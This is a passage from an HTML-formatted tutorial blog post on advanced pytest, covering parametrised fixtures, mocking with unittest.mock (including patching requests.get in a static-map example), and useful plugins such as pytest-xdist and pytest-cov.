&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;where the main functions, in our case &lt;code&gt;map.py&lt;/code&gt; are in the root directory and the tests are stored under &lt;code&gt;tests&lt;/code&gt;.&lt;/p&gt;
&lt;h1 id="parametrised-fixtures"&gt;Parametrised fixtures&lt;/h1&gt;
&lt;p&gt;In &lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;Part 1&lt;/a&gt; we introduced the concept of fixtures in pytest.
Now, let&amp;rsquo;s explore parametrised fixtures, a powerful feature that allows us to run the same test logic with
different inputs. This helps avoid code duplication while testing various scenarios without rewriting your tests.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pytest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@pytest.fixture&lt;/span&gt;(params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;input_value&lt;/span&gt;(request):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; request&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;param
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_increment&lt;/span&gt;(input_value):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; input_value &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; input_value
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This test will run three times—once for each value in the params list (1, 2, and 3). By parameterising the fixture,
we effectively reuse the same test logic across multiple inputs. This makes your tests more compact and helps catch
potential issues that might only appear with certain values.&lt;/p&gt;
&lt;h1 id="mocking"&gt;Mocking&lt;/h1&gt;
&lt;p&gt;Mocking is the process of replacing a real object with a pretend object, which records how it is called and can assert
if it is called incorrectly. In python, mocking can be performed via the &lt;code&gt;unittest.mock&lt;/code&gt; module.
We can create a mock version of a function as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/test_mock_function.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;unittest.mock&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Mock
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mock_function &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Mock(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_function&amp;#34;&lt;/span&gt;, return_value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This creates a new object called &lt;code&gt;mock_function&lt;/code&gt; which can be used in place of any other function.
The &lt;code&gt;name=&amp;quot;my_function&amp;quot;&lt;/code&gt; argument is a label for the &lt;code&gt;mock_function&lt;/code&gt; which is useful when debugging.
The &lt;code&gt;return_value=2&lt;/code&gt; argument for &lt;code&gt;Mock&lt;/code&gt; means that any time that &lt;code&gt;mock_function()&lt;/code&gt; is called, it will
return &lt;code&gt;2&lt;/code&gt;, regardless of any other arguments passed to &lt;code&gt;mock_function()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can use our &lt;code&gt;mock_function&lt;/code&gt; in a test:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/test_mock_function.py (continued)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_mock_function_works&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; mock_function() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; mock_function(&lt;span style="color:#a5d6ff"&gt;123&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;abc&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running the test script shows that &lt;code&gt;mock_function()&lt;/code&gt; always returns 2.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m pytest tests/test_mock_function.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;platform linux -- Python 3.10.12, pytest-8.3.5, pluggy-1.5.0
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rootdir: /PATH/pytest-advanced-blog-post
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;collected &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; item
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tests/test_mock_function.py . &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; passed in 0.02s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h1 id="mocking-external-dependencies"&gt;Mocking External Dependencies&lt;/h1&gt;
&lt;p&gt;When testing functions that interact with external systems (such as APIs or databases), it&amp;rsquo;s important to isolate the
code being tested. We want to avoid having our tests make real calls to remote resources, as this could cause failures
due to issues like internet outages or slow database responses. Instead, we use mocks. Pytest supports mocking by
integrating with the &lt;code&gt;unittest.mock&lt;/code&gt; module (here we use the &lt;code&gt;patch&lt;/code&gt; function).&lt;/p&gt;
&lt;p&gt;Let consider an example of some code (&lt;code&gt;map.py&lt;/code&gt;) that retrieves and displays a static map image of a geographic location
(Paris in this case).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_at&lt;/span&gt;(lat, long, satellite&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;, zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; base &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://static-maps.yandex.ru/1.x/?&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dict(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; z&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;zoom,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;str(size[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(size[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ll&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;str(long) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(lat),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; l&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;sat&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; satellite &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lang&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;en_US&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(base, params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;params, timeout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paris_map &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; map_at(&lt;span style="color:#a5d6ff"&gt;48.853&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.3499&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;IPython&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;IPython&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;core&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;display&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Image(paris_map&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this example there is a single function &lt;code&gt;map_at()&lt;/code&gt; that could be tested. Additional code in the script makes
use of that function (&lt;code&gt;paris_map = map_at(...)&lt;/code&gt;). The way the script is written means that whenever it is
loaded as a module (&lt;code&gt;import map&lt;/code&gt;), all of the top-level commands will be evaluated. In particular, when a test
script loads this module, the commands &lt;code&gt;paris_map = map_at(...)&lt;/code&gt; and &lt;code&gt;...Image(paris_map.content)&lt;/code&gt; will run.
You don&amp;rsquo;t want this to happen. That is, you don&amp;rsquo;t want to run all of the code in your analysis scripts, just to
test that the functions within it work correctly, it will make your testing routine take a long time.&lt;/p&gt;
&lt;p&gt;The top-level code that displays a map of Paris is script-specific. It should run when &lt;code&gt;map.py&lt;/code&gt; is ran as a script,
but not when &lt;code&gt;map.py&lt;/code&gt; is imported. The standard Python way to prevent script-specific code from running when a
module is imported, is to wrap it in the following block:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# script-specific commands go here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To make testing easier, we can make &lt;code&gt;map.py&lt;/code&gt; a little more import-safe:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;IPython&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_at&lt;/span&gt;(lat, long, satellite&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;, zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Function body is unchanged&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(base, params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;params, timeout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; paris_map &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; map_at(&lt;span style="color:#a5d6ff"&gt;48.853&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.3499&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; IPython&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;core&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;display&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Image(paris_map&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can load the functions from &lt;code&gt;map.py&lt;/code&gt; without having to run all the other script-specific code within it.
Then the test file (&lt;code&gt;test_map.py&lt;/code&gt;) for the &lt;code&gt;map.py&lt;/code&gt; would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;unittest.mock&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; patch
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;map&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; map_at
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_build_default_params&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;object(requests, &lt;span style="color:#a5d6ff"&gt;&amp;#34;get&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; mock_get:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; map_at(&lt;span style="color:#a5d6ff"&gt;51.0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mock_get&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;assert_called_with(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://static-maps.yandex.ru/1.x/?&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;z&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;size&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;400,400&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ll&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0,51.0&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;l&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;map&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lang&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;en_US&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; timeout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This test checks the behavior of the &lt;code&gt;map_at&lt;/code&gt; function. Using the
&lt;code&gt;unittest.mock.patch&lt;/code&gt; method, the test mocks the &lt;code&gt;requests.get&lt;/code&gt; function to prevent actual network calls.
It ensures that when the &lt;code&gt;map_at&lt;/code&gt; function is called with specific coordinates, it generates the correct &lt;code&gt;HTTP GET request&lt;/code&gt; with the expected &lt;code&gt;URL&lt;/code&gt; and &lt;code&gt;parameters&lt;/code&gt; (such as zoom level, map type, and language).&lt;/p&gt;
&lt;p&gt;Similarly, you can patch a function using the context manager
&lt;code&gt;with patch.object(my_module, &amp;quot;original_function&amp;quot;, mock_function)&lt;/code&gt;
and this will mean that any calls to &lt;code&gt;my_module.original_function()&lt;/code&gt; will be replaced with calls to
&lt;code&gt;mock_function()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Mocking is important in testing because it isolates the code being tested from external dependencies, such as APIs,
databases, or file systems. This allows tests to run faster, as they do not rely on slow or unreliable external
services. Mocking also ensures tests are more predictable and repeatable by simulating specific responses or error
conditions, without making real network requests or modifying external data. This makes tests more focused on the
logic of the code itself, while avoiding unintended side effects.&lt;/p&gt;
&lt;h1 id="useful-pytest-plugins"&gt;Useful pytest Plugins&lt;/h1&gt;
&lt;p&gt;Pytest&amp;rsquo;s functionality can be extended through a rich ecosystem of
&lt;a href="https://docs.pytest.org/en/stable/reference/plugin_list.html" rel="external"&gt;plugins&lt;/a&gt;. Here are some useful plugins:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;pytest-xdist:&lt;/code&gt; Enables parallel test execution, speeding up test runs.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pip install pytest-xdist
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pytest -n auto
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;pytest-cov:&lt;/code&gt; Provides code coverage reports.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pip install pytest-cov
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pytest --cov&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;your_package
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;pytest-mock:&lt;/code&gt; Simplifies mocking by integrating with &lt;code&gt;unittest.mock&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pip install pytest-mock
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By integrating these advanced pytest features, you can make your tests more efficient, reproducible,
and easier to manage. Don&amp;rsquo;t hesitate to experiment with parametrised fixtures, mocking, and useful
plugins like &lt;code&gt;pytest-cov&lt;/code&gt; and &lt;code&gt;pytest-xdist&lt;/code&gt; to level up your testing.&lt;/p&gt;
&lt;p&gt;
